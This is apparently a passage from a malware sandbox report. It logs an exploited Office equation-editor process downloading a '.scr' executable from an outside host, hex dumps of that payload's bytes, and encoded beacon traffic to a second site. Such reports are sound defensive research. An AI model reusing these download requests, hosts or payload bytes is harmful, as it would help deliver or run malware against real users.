                                Data Raw: 38 34 4f 30 3d 6d 43 38 6c 66 71 4d 48 33 4b 39 4f 69 4e 76 61 39 65 48 57 2f 70 74 72 5a 4e 46 76 61 35 50 41 4e 45 69 74 78 74 79 41 6f 32 37 36 78 74 65 72 68 75 44 4f 6e 6b 74 4c 51 76 58 67 63 61 5a 61 6c 4f 55 73 4f 35 4a 63 76 63 56 32 2b 35 35 57 37 72 2f 4a 79 77 75 51 46 6f 44 62 64 51 37 55 47 4b 46 73 57 55 68 4c 76 4d 43 73 79 57 67 68 65 76 69 6b 51 43 4a 33 51 31 5a 39 65 6d 49 43 70 63 38 71 43 44 4a 73 41 75 76 63 6f 63 46 47 4f 59 2b 78 32 66 47 4a 65 51 61 51 4e 4e 77 78 6a 4d 72 79 62 6c 68 6b 31 39 47 6c 4b 5a 36 45 62 2f 64 58 61 52 37 47 79 75 75 66 50 36 54 71 4b 6f 56 61 46 32 54 63 59 56 6d 43 39 75 6f 76 53 6e 47 6d 7a 57 4f 31 59 49 2f 44 52 52 50 70 6e 41 6c 49 64 52 65 66 36 79 62 51 6d 77 6d 38 50 63 61 6a 59 33 7a 59 2f 35 57 48 6f 71 48 37 65 71 75 4e 4c 39 47 54 65 2f 64 54 31 77 66 36 64 4c 6d 48 38 33 2f 45 57 35 7a 6c 50 4a 47 6a 62 35 46 68 56 79 58 4e 56 45 51 37 71 31 41 32 65 37 58 7a 4e 71 39 55 4a 45 37 59 56 77 72 42 77 30 68 75 39 75 32 2f 61 39 4d 65 44 [TRUNCATED]
                                Data Ascii: 84O0=mC8lfqMH3K9OiNva9eHW/ptrZNFva5PANEitxtyAo276xterhuDOnktLQvXgcaZalOUsO5JcvcV2+55W7r/JywuQFoDbdQ7UGKFsWUhLvMCsyWghevikQCJ3Q1Z9emICpc8qCDJsAuvcocFGOY+x2fGJeQaQNNwxjMryblhk19GlKZ6Eb/dXaR7GyuufP6TqKoVaF2TcYVmC9uovSnGmzWO1YI/DRRPpnAlIdRef6ybQmwm8PcajY3zY/5WHoqH7equNL9GTe/dT1wf6dLmH83/EW5zlPJGjb5FhVyXNVEQ7q1A2e7XzNq9UJE7YVwrBw0hu9u2/a9MeDg3BxwwnvxmQU2cRcb0ZoTOGvu8J+ZjdDZ87Ilc/yRlVblbceoFudcmJQKzLuClsA1FBpobw8PEMhuN7Bf9tpF0S1qkOdG75O+DYuoP3+X5ESJlF/OS0AVwXWRRhpj0nZZO1PQIZn1ZwF98WYw59GgQwLnScbcC27jd3jHHIDFKrO8/TZyykAbaNKIpcVfGxvA2BF/ah+vn1QFoug08M2JnfrpfUWIJWDcUqq4RxT6HPMJVCLrMQErtG3BZNsXW3Ugbm3G7W3ySdaNqHQEEmayKa34fJFgZSBl67cy31ZoQ6JGvlfl3Vu+82K9e0u/wvF7lAvlzGFqJx0uGP6mlEr7v/2SaKdMYN8o1wf1O7y0bC70jBtwdaKWKGEy6aJH6jDvsQuPWBPEVFPrXtQUxTpNAdu7gOmBIQQHfFmtR9HQlKoGJkaoRvq7np5DmuKuWT4DEgS18dCo5M7kFOp0g4YLqKpYvL0it/nrO6rA/LANXJT51zhN9tzR9fwSGbA4GZzOHfmkmhjA+avfY2R/KtpLfbi4ZxU81Mv5SrcU0vsmZZOxwSfBH3Gs4Ta001fkXHFjFzbrIXs/jBtNPKTvWzbc0HFwDKD9jh754yeH4tRP2H8dfrClNVvGuvHpBnx6Vk9A3mJnEgQVU6voRJdDVMEB4GDAbFPu+0gMf [TRUNCATED]
                                May 20, 2024 08:55:45.824445009 CEST1684OUTData Raw: 55 4d 6a 6e 4a 55 78 4e 63 45 76 6a 6f 36 51 46 58 42 43 43 2b 67 30 54 5a 76 72 35 68 6a 65 71 42 38 4a 7a 54 33 33 46 63 48 48 41 4a 45 76 32 6e 66 78 73 36 53 4b 2b 78 56 74 6a 55 36 50 65 6e 33 62 6f 78 6a 47 33 32 43 5a 2f 6a 44 52 51 6b 46
                                Data Ascii: UMjnJUxNcEvjo6QFXBCC+g0TZvr5hjeqB8JzT33FcHHAJEv2nfxs6SK+xVtjU6Pen3boxjG32CZ/jDRQkF/o9G/CwztzQW8XyHbqBPjkkBSOfSg5AA4M/3qOm3wzqhY06RWeJ8uNwH277GYIHyLxkHQcMgT9xjaJcQyh1pPoazLXTv5+y5vjkfEwdG8cyxLT0ZOdrNM/CZC6bEkCdzV5k6zZOSeqTADyWzSvJ1f6UbHrho4LYyP
                                May 20, 2024 08:55:46.535566092 CEST1236INHTTP/1.1 404 Not Found
                                Date: Mon, 20 May 2024 06:55:46 GMT
                                Server: Apache
                                X-Powered-By: PHP/8.1.28
                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                Cache-Control: no-cache, must-revalidate, max-age=0
                                Link: <http://aceautocorp.com/wp-json/>; rel="https://api.w.org/"
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Vary: Accept-Encoding
                                Content-Encoding: br
                                Content-Length: 9730
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 13 53 cb 14 91 9a f4 43 40 45 60 dc c4 c7 3a cf f7 9f a9 da 9f a5 cb e9 19 9e 48 84 03 40 00 58 5a a8 14 67 8b 7f 69 4e 7e b3 3d 1e 88 04 25 6e 28 82 03 40 c5 cb e5 5f b6 ea f3 bc a5 63 32 81 24 59 32 81 97 2c 39 06 a2 b9 7a 90 79 aa ea 9e 8e a8 9e d9 d1 70 a8 17 4e 31 24 c5 e2 1d 67 be 84 aa ae ae ee e1 fb fb 91 c1 33 84 e8 38 72 ec 19 61 0b d8 70 64 b8 64 58 86 6c 3d 86 6a b2 fd b4 fb 06 11 51 14 51 93 76 db 70 79 99 58 f7 de 86 10 ac 25 02 13 93 a1 9a c9 d8 e4 97 03 27 30 58 c8 54 32 df 5a 8c b9 bd 10 f9 21 22 92 70 57 3d 45 37 cf 39 e5 74 4c 81 19 a8 3e 4a c0 e0 76 c9 35 60 d2 59 2b a4 87 09 0e f6 69 16 b9 6c 1f ae 50 b2 ab bd c4 70 95 53 0a 88 16 3a 07 45 5b 15 ee 10 81 d8 52 ea 36 2b 81 cb 7c 4a d7 a9 3f ec d6 2f 07 d6 47 75 3d 07 c6 20 1d 63 99 16 f1 4c d7 9e 29 be c0 be 19 18 8c 07 76 25 90 77 ef 5d 88 12 3e d7 1a 3e 9f bc 81 d4 31 ce 7a f6 48 cb 0f 7d 37 fc 00 ab fb 6a dd 0c 0e f3 35 68 b5 af 0f eb 13 37 5c 6c b3 51 b5 be df 84 4d 3b 4e f0 a0 d0 b4 c7 0a 88 a3 69 9d 91 4b 37 9c 15 e8 a8 83 [TRUNCATED]
                                Data Ascii: SC@E`:H@XZgiN~=%n(@_c2$Y2,9zypN1$g38rapddXl=jQQvpyX%'0XT2Z!"pW=E79tL>Jv5`Y+ilPpS:E[R6+|J?/Gu= cL)v%w]>>1zH}7j5h7\lQM;NiK7p^ucBN6_m},5Ce{fQo*Pnz]y8v3<&{iy<oD87yW$7D;qe;z;lhBjr$c:ysDu*uVQ=Y*a1<)pP:D?^7pYtd(1]0m&1oyWhR7(+?KU{^C+"c<y'YQkpf1N|fmpW>nlz4k_\+)weabmC_t'Ljk_1xbZ9*!TxT=,OMV$9oO2Qk5wVlv"ju}OFE:I
                                May 20, 2024 08:55:46.537499905 CEST1236INData Raw: ff fe ae f2 bb c6 15 b4 9f b2 34 36 8d 88 04 d3 83 e4 ba 7d b9 fd b8 4b 8d 6b 26 6d 11 2e 93 81 0b 07 ba 98 b1 dd d2 4c d5 32 49 81 73 db 89 1d da fd 86 dd 10 9e b1 14 44 ca bf b1 05 c1 18 b3 15 9a ef 07 5a 56 ab 41 37 55 11 ff a5 a6 85 ff 18 fb
                                Data Ascii: 46}Kk&m.L2IsDZVA7UC[-zRpWjc{V}fMeSj(70QD/_x"V2/U#+n`tB(E$C(+|fiZcRuzIT>PDbCH{gXzl]
                                May 20, 2024 08:55:46.542284012 CEST1236INData Raw: a6 e9 d1 fc 4e 09 48 a9 91 16 4d ba 79 e1 14 a5 86 ac d9 d2 85 4c db 63 05 70 d3 54 cc 0b ca a1 7b 43 51 ef 54 7c 9d 4f eb 7b 40 8e 18 dc 1b 05 6b 5f 0a 1f ee bd 81 47 8d 7f 70 54 56 9d d9 53 78 45 32 a0 47 04 43 b6 0e db d3 64 59 85 0c 30 6c cb
                                Data Ascii: NHMyLcpT{CQT|O{@k_GpTVSxE2GCdY0l_-5%cB_^hb0>(M\{m`G1HVW.$+:c\b&8/J0|;W4z1cZ[:x.Ge0f,RLt9 <
                                May 20, 2024 08:55:46.542306900 CEST1236INData Raw: 2c de 7a 12 5b 3b 16 17 23 25 46 6e 21 5b fa fb 49 2b 66 f4 ca 86 64 84 b2 e8 65 7a ea c8 f3 86 57 00 de 59 2c 12 a6 dc 18 10 09 71 50 d4 65 3d 97 1f 07 70 05 41 59 f0 64 85 60 66 41 07 51 82 55 b1 12 7e f6 88 b7 b2 b3 18 4d b3 4a 65 f5 6b 59 df
                                Data Ascii: ,z[;#%Fn![I+fdezWY,qPe=pAYd`fAQU~MJekY2&5|W|pWb`u.X0q6R2\t};'TZ'Ekbyw:#:r/6k9);L2wh<kA`nRHRy5
                                May 20, 2024 08:55:46.551820040 CEST1236INData Raw: 35 7d 2b 04 c9 0e de 40 a2 c4 6d 52 c0 6d be 8b 85 4e 27 8c 1e 87 ac 48 f2 6b 4f b4 b5 50 59 cc ca b3 7a 5f 01 b7 e2 2a 00 15 69 66 49 78 1d 82 bc 25 cc 3e 47 e0 01 99 aa fb 46 58 69 ce 73 ad 76 1a 11 23 be ce 6b a9 f2 9c 9f e0 fb 3a 6f b2 44 84
                                Data Ascii: 5}+@mRmN'HkOPYz_*ifIx%>GFXisv#k:oD5l~wU5>x(,VjIS(~(%RD`6|@1DaXC(=3"BjO#M,&6lC9;~$JH|ZfVIND
                                May 20, 2024 08:55:46.551840067 CEST1236INData Raw: d3 e3 ba db 3b 9c a9 1b 29 ab 3c 1a 8c b4 67 52 69 00 ac 71 98 60 ac 50 02 6b ca ca 6a 76 5a a5 3e d2 40 44 63 c1 55 52 bd 0c 78 22 43 f8 29 c2 04 b6 6b 9e d2 5b 22 88 06 25 89 4b 5a 6f b9 b0 9a 91 41 01 14 ee da 0e 65 3c 0f 08 48 45 17 b3 a4 dc
                                Data Ascii: ;)<gRiq`PkjvZ>@DcURx"C)k["%KZoAe<HEh&>Qx])Vb{>!K ;+Kjj%|9_]9*Wps@'N2>Dw'>7\(_:FtL,\`Yu.t
                                May 20, 2024 08:55:46.561337948 CEST1236INData Raw: 43 07 5c 38 e1 0d 28 6f df 07 72 da 69 d9 07 e1 b4 d3 61 1f 44 d3 4e 47 7d 10 4f 3b 1d f7 41 32 ed 74 d2 07 e9 b4 d3 69 1f 64 d3 4e 67 7d 90 4f 3b 9d ff 2b 10 fc bc 7a c1 cf eb 62 75 af 2e 5c 3f c8 c9 f9 8b 06 04 d5 da 24 31 35 fa 5c 9c 16 b5 03
                                Data Ascii: C\8(oriaDNG}O;A2tidNg}O;+zbu.\?$15\cRd\gtFc8khbbGDobzha+M]<(x^ap#;Jf\a$y/'Tijc^ej,X9=VuMJ_
                                May 20, 2024 08:55:46.564086914 CEST1236INData Raw: d8 6d 5b 3a 5b 17 27 db 07 b8 f3 ec 73 c5 37 f4 08 7f d1 83 7f fb 6b b6 35 27 bb 71 71 ba 51 3a dd a0 94 a6 1b dd 32 fa ef e1 89 5b bb 5e ff 6c f0 21 ae 1f 3c b9 b4 68 7c c1 c5 b4 ad 5c 63 68 09 3b a0 7c b0 0e 53 a6 e0 66 4d 7d 56 9a ad a7 b1 9a
                                Data Ascii: m[:['s7k5'qqQ:2[^l!<h|\ch;|SfM}VnnD'FWUqnm$k27;Ey1-].i"]_x8`=i3`O!E[2MeX(RQYzk].fpYV~grj
                                May 20, 2024 08:55:46.564125061 CEST259INData Raw: 3b f8 45 7b db 1f e8 a0 eb 60 c8 aa b1 87 93 6f 0f e9 b2 55 36 29 37 dd 0d bf e9 da eb 06 5a a0 1c 73 16 49 86 4f 13 b3 a6 85 ce bf 7e 78 b3 c4 db 9b 4c 25 cc a4 7c 1a d6 80 69 00 65 61 44 4b 5c e1 ce 02 17 e5 d2 02 b1 d0 e7 72 7d f0 2e 6c 50 96
                                Data Ascii: ;E{`oU6)7ZsIO~xL%|ieaDK\r}.lPhzmih4fE|\*'5%W>|V_c:CSf]S[:m=B{&b/48N5Mk8eM`mgu@opl'X&J`9TcHR2


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                18192.168.2.2249183198.12.241.35802108C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exe
                                TimestampBytes transferredDirectionData
                                May 20, 2024 08:55:48.350016117 CEST469OUTGET /ufuh/?-Hc=N8_LbDFHuLL4ejZ&84O0=rAUFcaE3iKkr5p3m3tCLoIcgJcoBLqHpCHmto+mEvmfk+N6Cgt65oFJJSbTgZ9R+lJhnJt4KhMELuPRI2YfMmSiqMqXmclfFfZpNLn5Guu+tn093ffeUIUJTcA0L HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.5
                                Connection: close
                                Host: www.aceautocorp.com
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                May 20, 2024 08:55:49.007123947 CEST549INHTTP/1.1 301 Moved Permanently
                                Date: Mon, 20 May 2024 06:55:48 GMT
                                Server: Apache
                                X-Powered-By: PHP/8.1.28
                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                Cache-Control: no-cache, must-revalidate, max-age=0
                                X-Redirect-By: WordPress
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Location: http://aceautocorp.com/ufuh/?-Hc=N8_LbDFHuLL4ejZ&84O0=rAUFcaE3iKkr5p3m3tCLoIcgJcoBLqHpCHmto+mEvmfk+N6Cgt65oFJJSbTgZ9R+lJhnJt4KhMELuPRI2YfMmSiqMqXmclfFfZpNLn5Guu+tn093ffeUIUJTcA0L
                                Vary: Accept-Encoding
                                Content-Length: 0
                                Content-Type: text/html; charset=UTF-8


                                HTTPS Proxied Packets

                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.2.2249164104.21.74.1914431596C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                TimestampBytes transferredDirectionData
                                2024-05-20 06:53:37 UTC316OUTGET /loudzx.scr HTTP/1.1
                                Accept: */*
                                Accept-Encoding: gzip, deflate
                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                Host: universalmovies.top
                                Connection: Keep-Alive
                                2024-05-20 06:53:38 UTC779INHTTP/1.1 200 OK
                                Date: Mon, 20 May 2024 06:53:38 GMT
                                Content-Type: application/x-silverlight
                                Content-Length: 1273344
                                Connection: close
                                Last-Modified: Mon, 20 May 2024 00:08:13 GMT
                                ETag: "136e00-618d77f4db231"
                                Accept-Ranges: bytes
                                CF-Cache-Status: DYNAMIC
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d7IPBJrMoqBn980ApDnET%2FyVpNh6ApfvRLq0wLzNRf9CY%2BjEya2%2BW3DOEfnlWjsYfbyKUMa%2F57GE8IuY3BgKSzQHLx%2FyfIH24I%2BG6LbFS%2FljDQMKZEbGBAQgRqiChrOIVUNfRzT7"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                X-Content-Type-Options: nosniff
                                Server: cloudflare
                                CF-RAY: 886a69289df50c7a-EWR
                                alt-svc: h3=":443"; ma=86400
                                2024-05-20 06:53:38 UTC590INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 32 3e 2b cc 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 62 13 00 00 0a 00 00 00 00 00 00 3e 81 13 00 00 20 00 00 00 a0 13 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 13 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL2>+"0b> @ `
                                2024-05-20 06:53:38 UTC1369INData Raw: 00 00 62 00 00 00 1a 00 00 00 84 00 00 00 00 00 00 00 25 00 00 00 24 00 00 00 26 00 00 00 00 00 00 00 6f 00 00 00 19 00 00 00 10 00 00 00 84 00 00 00 1b 00 00 00 00 00 00 00 0d 00 00 00 18 00 00 00 5e 00 00 00 6f 00 00 00 19 00 00 00 08 00 00 00 62 00 00 00 1a 00 00 00 53 00 00 00 00 00 00 00 35 00 00 00 22 00 00 00 1b 00 00 00 18 00 00 00 16 00 00 00 14 00 00 00 13 00 00 00 12 00 00 00 11 00 00 00 11 00 00 00 10 00 00 00 10 00 00 00 0f 00 00 00 0f 00 00 00 0e 00 00 00 0e 00 00 00 0e 00 00 00 0e 00 00 00 0e 00 00 00 0d 00 00 00 0d 00 00 00 0d 00 00 00 0d 00 00 00 0d 00 00 00 0d 00 00 00 0c 00 00 00 0c 00 00 00 0c 00 00 00 0c 00 00 00 0c 00 00 00 0c 00 00 00 0c 00 00 00 0c 00 00 00 0c 00 00 00 0c 00 00 00 00 00 00 00 18 00 00 00 5e 00 00 00 6f 00 00 00 19
                                Data Ascii: b%$&o^obS5"^o
                                2024-05-20 06:53:38 UTC1369INData Raw: 00 00 01 2a 0a 14 2a 1e 02 28 79 00 00 0a 2a 32 17 73 7a 00 00 0a 80 53 00 00 04 2a 3a 02 28 57 00 00 0a 02 03 7d 5b 00 00 04 2a 1e 03 14 51 04 14 51 2a 96 03 72 ba 17 00 70 28 7b 00 00 0a 2c 0d 02 7b 5b 00 00 04 17 28 7c 00 00 0a 2a 20 1f 30 13 80 73 1e 0f 00 06 7a 06 2a 2a 03 6f f9 0e 00 06 16 fe 03 2a 82 02 03 28 db 0a 00 06 02 1f 20 73 08 0b 00 06 7d 62 00 00 04 02 73 7d 00 00 0a 7d 63 00 00 04 2a 36 02 03 05 04 1f 10 60 73 42 07 00 06 2a 22 1f 33 73 e7 06 00 06 7a 46 02 28 e6 0a 00 06 74 97 00 00 02 6f fe 05 00 06 2a 46 02 28 e6 0a 00 06 74 97 00 00 02 6f ff 05 00 06 2a 4a 02 7b 62 00 00 04 03 6f 0e 0b 00 06 74 15 00 00 01 2a 4a 02 7e cd 02 00 04 72 10 18 00 70 17 28 ca 0a 00 06 2a 56 02 03 72 10 18 00 70 17 28 ca 0a 00 06 02 16 7d 73 04 00 04 2a 22
                                Data Ascii: **(y*2szS*:(W}[*QQ*rp({,{[(|* 0sz**o*( s}bs}}c*6`sB*"3szF(to*F(to*J{bot*J~rp(*Vrp(}s*"
                                2024-05-20 06:53:38 UTC1369INData Raw: 7c 00 00 04 03 84 6f 90 00 00 0a 2a 32 02 7b 75 00 00 04 8c e7 00 00 01 2a 2e 20 b0 13 00 00 73 e7 06 00 06 7a 86 0e 05 0e 06 2e 0b 20 bd 01 00 00 73 e7 06 00 06 7a 02 03 04 05 0e 04 0e 05 0e 06 28 87 00 00 06 2a 1e 02 7b 7c 00 00 04 2a 3a 02 28 57 00 00 0a 02 03 7d 7e 00 00 04 2a 6e 02 03 7b 83 00 00 04 28 c7 00 00 06 02 03 7d 7f 00 00 04 02 16 7d 80 00 00 04 2a 82 02 17 7d 80 00 00 04 02 7b 7f 00 00 04 02 6f d2 03 00 06 02 7b 7f 00 00 04 6f d5 00 00 06 26 2a 6a 02 7b 80 00 00 04 2d 10 02 7b 83 00 00 04 20 e1 04 00 00 6f 3f 03 00 06 02 2a 5a 02 03 28 c7 00 00 06 02 04 7d 81 00 00 04 02 05 7d 82 00 00 04 2a 36 02 7b 82 00 00 04 03 6f d2 00 00 06 2a 66 02 7b 81 00 00 04 03 6f e0 00 00 06 02 7b 82 00 00 04 03 6f e0 00 00 06 2a 3a 02 28 57 00 00 0a 02 03 7d
                                Data Ascii: |o*2{u*. sz. sz(*{|*:(W}~*n{(}}*}{o{o&*j{-{ o?*Z(}}*6{o*f{o{o*:(W}
                                2024-05-20 06:53:38 UTC1369INData Raw: ac 00 00 04 16 6f 87 00 00 0a 74 59 00 00 02 17 7d f9 01 00 04 2a d6 02 7b ac 00 00 04 6f 82 00 00 0a 17 33 25 02 7b ac 00 00 04 16 6f 87 00 00 0a 75 87 00 00 02 2c 12 02 7b ac 00 00 04 16 6f 87 00 00 0a 74 87 00 00 02 2a 14 2a 3a 02 7b b0 00 00 04 03 6f 81 00 00 0a 26 2a ba 02 7e cd 02 00 04 72 32 1b 00 70 17 28 ca 0a 00 06 02 7e b5 00 00 04 7d b2 00 00 04 02 80 b6 00 00 04 02 7e b5 00 00 04 7d f4 06 00 04 2a aa 02 03 72 32 1b 00 70 17 28 ca 0a 00 06 02 04 7d b2 00 00 04 04 02 7d 93 05 00 04 02 04 7d f4 06 00 04 02 16 7d 73 04 00 04 2a 66 03 8e 2d 07 16 8c e0 00 00 01 2a 03 16 9a 28 86 03 00 06 8c e0 00 00 01 2a 3a 02 7b b2 00 00 04 16 16 73 77 01 00 06 2a 22 02 03 28 73 01 00 06 2a 3a 02 7b b2 00 00 04 03 17 73 77 01 00 06 2a 3a 02 7b b2 00 00 04 03 16
                                Data Ascii: otY}*{o3%{ou,{ot**:{o&*~r2p(~}~}*r2p(}}}}s*f-*(*:{sw*"(s*:{sw*:{
                                2024-05-20 06:53:38 UTC1369INData Raw: fe 03 2a 17 2a 72 02 7b 77 01 00 04 2d 12 02 7b 6e 01 00 04 75 44 00 00 02 14 fe 03 16 fe 01 2a 17 2a 2a 02 03 05 04 73 63 07 00 06 2a 1e 02 7b 90 01 00 04 2a 2a 02 03 1f 14 28 de 0a 00 06 2a 2a 02 03 1f 14 28 e3 0a 00 06 2a 2a 02 03 1f 14 28 e8 0a 00 06 2a 1e 02 28 f8 01 00 06 2a 1e 02 7b 8d 01 00 04 2a 1e 02 7b 92 01 00 04 2a 8a 02 7b 8f 01 00 04 6f d5 00 00 06 26 02 7b f5 06 00 04 74 52 01 00 02 7b e1 07 00 04 74 18 00 00 01 2a 9a 02 7b 8e 01 00 04 14 28 99 00 00 0a 2c 11 02 02 7b 8f 01 00 04 6f d5 01 00 06 7d 8e 01 00 04 02 7b 8e 01 00 04 2a 32 02 28 01 02 00 06 74 29 00 00 01 2a aa 02 7b 8f 01 00 04 75 78 00 00 02 2c 1b 02 7b 8f 01 00 04 6f d5 00 00 06 74 78 00 00 02 7b 61 02 00 04 6f c1 0b 00 06 2a 02 2a 8a 02 03 14 28 0c 02 00 06 03 7b b4 02 00 04
                                Data Ascii: **r{w-{nuD***sc*{**(**(**(*(*{*{*{o&{tR{t*{(,{o}{*2(t)*{ux,{otx{ao**({
                                2024-05-20 06:53:38 UTC1369INData Raw: 0d 00 06 2a 2e 28 dd 05 00 06 6f 16 0d 00 06 2a 2e 28 dd 05 00 06 6f 17 0d 00 06 2a 2e 28 dd 05 00 06 6f 18 0d 00 06 2a 2e 28 dd 05 00 06 6f 19 0d 00 06 2a 2e 28 dd 05 00 06 6f 1a 0d 00 06 2a 2e 28 dd 05 00 06 6f 1b 0d 00 06 2a 2e 28 dd 05 00 06 6f 1c 0d 00 06 2a 2e 28 dd 05 00 06 6f 1d 0d 00 06 2a 2e 28 dd 05 00 06 6f 1e 0d 00 06 2a 2e 28 dd 05 00 06 6f 1f 0d 00 06 2a 2e 28 dd 05 00 06 6f 20 0d 00 06 2a 2e 28 dd 05 00 06 6f 21 0d 00 06 2a 2e 28 dd 05 00 06 6f 22 0d 00 06 2a 2e 28 dd 05 00 06 6f 23 0d 00 06 2a 2e 28 dd 05 00 06 6f 24 0d 00 06 2a 2e 28 dd 05 00 06 6f 25 0d 00 06 2a 2e 28 dd 05 00 06 6f 26 0d 00 06 2a 2e 28 dd 05 00 06 6f 27 0d 00 06 2a 2e 28 dd 05 00 06 6f 28 0d 00 06 2a 2e 28 dd 05 00 06 6f 29 0d 00 06 2a 2e 28 dd 05 00 06 6f 2a 0d 00 06
                                Data Ascii: *.(o*.(o*.(o*.(o*.(o*.(o*.(o*.(o*.(o*.(o*.(o *.(o!*.(o"*.(o#*.(o$*.(o%*.(o&*.(o'*.(o(*.(o)*.(o*
                                2024-05-20 06:53:38 UTC1369INData Raw: 00 06 2a 2e 28 dd 05 00 06 6f 88 0d 00 06 2a 2e 28 dd 05 00 06 6f 89 0d 00 06 2a 2e 28 dd 05 00 06 6f 8a 0d 00 06 2a 2e 28 dd 05 00 06 6f 8b 0d 00 06 2a 2e 28 dd 05 00 06 6f 8c 0d 00 06 2a 2e 28 dd 05 00 06 6f 8d 0d 00 06 2a 2e 28 dd 05 00 06 6f 8e 0d 00 06 2a 2e 28 dd 05 00 06 6f 8f 0d 00 06 2a 8e 02 28 57 00 00 0a 02 16 7d e3 01 00 04 02 16 7d e4 01 00 04 02 16 7d e5 01 00 04 02 14 7d e6 01 00 04 2a 0e 1f 12 2a 36 02 28 0a 03 00 06 03 6f 02 00 00 0a 2a 36 02 28 0a 03 00 06 03 6f 03 00 00 0a 2a 36 02 28 0a 03 00 06 03 6f 04 00 00 0a 2a 36 02 28 0a 03 00 06 03 6f 05 00 00 0a 2a 36 02 28 0a 03 00 06 03 6f 06 00 00 0a 2a 36 02 28 0a 03 00 06 03 6f 07 00 00 0a 2a 1e 02 6f 6b 00 00 0a 2a 36 02 28 0a 03 00 06 03 6f 08 00 00 0a 2a 36 02 28 0a 03 00 06 03 6f 09
                                Data Ascii: *.(o*.(o*.(o*.(o*.(o*.(o*.(o*.(o*(W}}}}**6(o*6(o*6(o*6(o*6(o*6(o*ok*6(o*6(o
                                2024-05-20 06:53:38 UTC1369INData Raw: 28 e7 00 00 0a 2a e2 02 28 19 0c 00 06 2e 2e 02 28 c8 0b 00 06 2e 26 02 75 2d 01 00 02 2d 1e 02 75 20 00 00 02 2d 16 02 75 12 00 00 01 2c 0c 02 74 12 00 00 01 6f 96 00 00 0a 2a 16 2a 17 2a c2 02 28 c8 0b 00 06 2e 26 02 75 2d 01 00 02 2d 1e 02 75 20 00 00 02 2d 16 02 75 12 00 00 01 2c 0c 02 74 12 00 00 01 6f 96 00 00 0a 2a 16 2a 17 2a c2 02 75 2d 01 00 02 2d 26 02 28 19 0c 00 06 2e 1e 02 28 c8 0b 00 06 2e 16 02 75 12 00 00 01 2c 0c 02 74 12 00 00 01 6f 96 00 00 0a 2a 16 2a 17 2a 4e 02 75 20 00 00 02 2d 09 02 28 c8 0b 00 06 fe 01 2a 17 2a 2e 02 1b 59 1f 09 35 02 17 2a 16 2a f6 02 1f 09 59 45 05 00 00 00 0d 00 00 00 0d 00 00 00 0d 00 00 00 0d 00 00 00 0d 00 00 00 02 1f 20 2e 08 02 20 a0 00 00 00 33 02 17 2a 02 20 80 00 00 00 32 07 02 28 26 02 00 0a 2a 16 2a
                                Data Ascii: (*(..(.&u--u -u,to***(.&u--u -u,to***u--&(.(.u,to***Nu -(**.Y5**YE . 3* 2(&**
                                2024-05-20 06:53:38 UTC1369INData Raw: 00 70 99 94 41 5a 03 58 2a e2 02 28 79 02 00 0a 2c 0a 23 00 00 00 00 00 00 f8 ff 2a 23 00 00 dc c2 08 b2 3e c3 02 35 10 02 23 00 00 dc c2 08 b2 3e 43 35 04 02 6a 6c 2a 23 00 00 00 00 00 00 f8 ff 2a 3e 02 2c 0a 02 75 ed 00 00 02 14 fe 03 2a 17 2a 26 02 20 80 00 00 00 fe 04 2a 72 1f 41 02 30 05 02 1f 5a 31 10 1f 61 02 30 09 02 1f 7a fe 02 16 fe 01 2a 16 2a 17 2a 42 1f 30 02 30 09 02 1f 39 fe 02 16 fe 01 2a 16 2a 1a 7e 30 02 00 04 2a 7e 02 75 62 00 00 02 2d 0b 20 8e 13 00 00 73 e7 06 00 06 7a 02 74 62 00 00 02 7b 1f 02 00 04 2a a6 02 75 62 00 00 02 2d 0b 20 8e 13 00 00 73 e7 06 00 06 7a 03 28 f9 03 00 06 10 01 02 74 62 00 00 02 03 7d 1f 02 00 04 03 2a 3e 02 2d 0b 72 a8 2c 00 70 73 42 04 00 06 7a 2a 2e 02 2d 07 03 73 42 04 00 06 7a 2a 2e 72 c8 2c 00 70 73 42
                                Data Ascii: pAZX*(y,#*#>5#>C5jl*#*>,u**& *rA0Z1a0z***B009**~0*~ub- sztb{*ub- sz(tb}*>-r,psBz*.-sBz*.r,psB


                                Statistics

                                CPU Usage

                                Click to jump to process

                                Memory Usage

                                Click to jump to process

                                High Level Behavior Distribution

